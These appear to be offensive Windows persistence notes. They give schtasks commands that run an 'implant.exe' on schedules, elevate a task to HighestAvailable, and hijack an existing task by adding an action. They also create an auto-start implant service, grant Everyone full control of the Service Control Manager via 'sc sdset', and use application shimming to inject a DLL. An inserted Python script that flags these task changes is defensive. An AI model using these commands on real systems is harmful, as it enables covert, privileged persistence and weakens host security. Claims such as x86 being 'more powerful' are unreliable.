# normal @ 09:00 daily
schtasks /create /tn "MyTask\go" /sc daily /st 09:00 /tr "C:\windows\tasks\implant.exe"
# normal @ every 15 minutes
schtasks /create /tn "MyTask\go" /sc minute /mo 15 /tr "C:\windows\tasks\implant.exe"
# normal @ every 3 hours between 9-5
schtasks /create /tn "MyTask\go" /sc hourly /mo 3 /st 09:00 /etu 17:00 /tr "C:\windows\tasks\implant.exe"
# query
schtasks /query /tn "MyTask\Go" /fo list /v
# run
schtasks /run /tn "MyTask\Go"
# delete
schtasks /delete /tn "MyTask\Go"
Run in an elevated session and modify the task. Copy the task XML with schtasks:
schtasks /query /tn "MyTask\Go" /xml > task.xml
Within the <Principals></Principals> section add "<RunLevel>HighestAvailable</RunLevel>". Delete the original task, and create it again using the following:
# delete
schtasks /delete /f /tn MyTask
# create new from xml
schtasks /create /tn MyTask /xml task.xml
# query
schtasks /query /tn MyTask /v /xml
Take Over Task / multiple actions:
# get old task:
schtasks /query /tn "MyTask\Go" /xml > task.xml
# add to the <Actions></Actions> section in the XML file
<Exec>
<Command>C:\windows\tasks\implant.exe</Command>
</Exec>
# delete the task
schtasks /delete /tn "MyTask" /f
# add task
schtasks /create /tn "MyTask" /xml task.xml
# check the Task To Run section for multiple actions to confirm it worked
schtasks /query /tn "MyTask" /fo list /v
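Both task modifications above (the added RunLevel and the extra Exec action) are visible in the exported task XML. The following is an added example, not part of the original notes: a Python check that flags them in a `schtasks /query /xml` export. The directory list, the finding labels and the sample task are constructed assumptions.

```python
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler 2.0 task definitions.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Assumption: directories where a task binary is unusual; tune per environment.
SUSPECT_DIRS = ("c:\\windows\\tasks\\", "c:\\windows\\temp\\", "c:\\users\\public\\")

def audit_task_xml(xml_text):
    """Return a list of findings for one exported task definition."""
    root = ET.fromstring(xml_text)
    findings = []
    # Elevated run level requested by any principal.
    for principal in root.findall("t:Principals/t:Principal", NS):
        if principal.findtext("t:RunLevel", "", NS).strip() == "HighestAvailable":
            findings.append("runlevel-highest")
    # Every Exec action; a second action appended to an existing task shows up here.
    commands = [e.findtext("t:Command", "", NS).strip().strip('"')
                for e in root.findall("t:Actions/t:Exec", NS)]
    if len(commands) > 1:
        findings.append("multiple-actions:%d" % len(commands))
    for cmd in commands:
        if cmd.lower().startswith(SUSPECT_DIRS):
            findings.append("suspect-path:" + cmd)
    return findings

# Constructed sample: a vendor task that gained a RunLevel and a second action.
SAMPLE = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals>
    <Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal>
  </Principals>
  <Actions Context="Author">
    <Exec><Command>C:\Program Files\Vendor\updater.exe</Command></Exec>
    <Exec><Command>C:\windows\tasks\implant.exe</Command></Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for finding in audit_task_xml(SAMPLE):
        print(finding)
```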
Service:
create new service:
# create new service
sc create SERVICE_NAME binpath="C:\Windows\Tasks\implant.exe" start=auto
# query
sc query SERVICE_NAME
# start
sc start SERVICE_NAME
This will fail, but will still execute. It is advised to create a new proper service:
sc.exe sdset scmanager D:(A;;KA;;;WD)
Application Shimming:
x86 is more powerful than x64 now, so use 32-bit. Use Compatibility Administrator (32-bit). From cmd run:
compatadmin.exe /x
Right-click 'New Database > New', name it anything, set vendor = Microsoft, and select a good Windows 32-bit. Select InjectDLL under compatibility fixes and point it to your compiled DLL. Click Save.